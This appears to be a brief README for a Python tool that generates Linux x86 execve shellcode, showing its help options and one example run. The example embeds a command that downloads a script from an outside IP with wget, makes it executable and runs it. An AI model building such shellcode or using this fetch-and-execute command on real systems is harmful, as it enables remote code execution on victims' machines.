Python script to generate generic Linux X86 execve shellcode.

Usage:

optional arguments:
  -h, --help            show this help message and exit
  --command COMMAND, -c COMMAND
                        command to execute

Example:

python execveshellgen.py -c 'wget http://192.168.0.22:80/script.sh && chmod 777 script.sh && ./script.sh'